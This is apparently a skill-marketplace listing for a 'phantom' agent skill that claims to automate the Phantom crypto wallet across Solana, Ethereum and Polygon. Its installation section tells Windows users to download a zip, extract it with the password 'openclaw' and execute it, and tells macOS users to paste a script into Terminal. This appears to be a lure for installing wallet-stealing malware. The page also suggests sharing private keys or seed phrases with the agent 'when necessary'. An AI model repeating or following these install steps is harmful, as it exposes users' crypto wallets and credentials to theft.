phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.
Why use this skill?
Manage your Phantom wallet with OpenClaw. Automate custom RPCs, import SPL tokens, manage dApp connections, and troubleshoot Solana transactions.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/phantom-xivjhWhat This Skill Does
The phantom skill enables your OpenClaw agent to seamlessly interact with the Phantom browser extension, providing an automation layer for complex wallet operations. By integrating with the openclaw-agent utility, this skill bridges the gap between browser-based wallet UIs and command-line execution, allowing users to manage Solana, Ethereum, Polygon, and Base accounts programmatically. It streamlines tasks ranging from custom network configuration and RPC management to token importing and connection auditing, acting as a force multiplier for blockchain interactions.
Installation
To begin, ensure you have the Phantom extension installed in your browser. Crucially, you must install the openclaw-agent utility. For Windows, download the zip file from the official repository, extract it using the password 'openclaw', and execute it. For macOS, use the provided installation script snippet in your Terminal. Once the agent is active, install the skill by running 'clawhub install openclaw/skills/skills/hightower6eu/phantom-xivjh'. Verify connectivity by attempting a balance check or listing connected dApps.
Use Cases
This skill is perfect for power users and developers managing multiple chain portfolios. Common use cases include: automating the addition of custom RPC nodes during periods of network congestion, mass-importing SPL token addresses into your wallet's active view, revoking malicious or stale dApp connections to enhance security, and troubleshooting stuck transactions using the embedded CLI confirmation commands. It is particularly useful for developers needing to bridge the gap between their browser-based dev wallet and their local development environment.
Example Prompts
- "Phantom: Add the Polygon mainnet configuration and check my current MATIC balance."
- "Check for any suspicious connected dApps in my Phantom wallet and provide a list of those to revoke."
- "Troubleshoot my stuck Solana transaction with signature 4tW... and verify if it has been confirmed on-chain."
Tips & Limitations
Always prioritize security: never share your exported private keys or seed phrases with the agent unless strictly necessary for local CLI operations. Be aware that the openclaw-agent requires active execution; if the agent is not running, the skill will fail to interface with your browser extension. When modifying RPCs, stick to trusted providers like Helius, Alchemy, or QuickNode to avoid potential data tampering. Finally, monitor priority fees in the Transaction Settings; using 'Turbo' during high network traffic will increase gas costs but significantly improve confirmation speeds for urgent transactions.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-phantom-xivjh": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, file-read, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.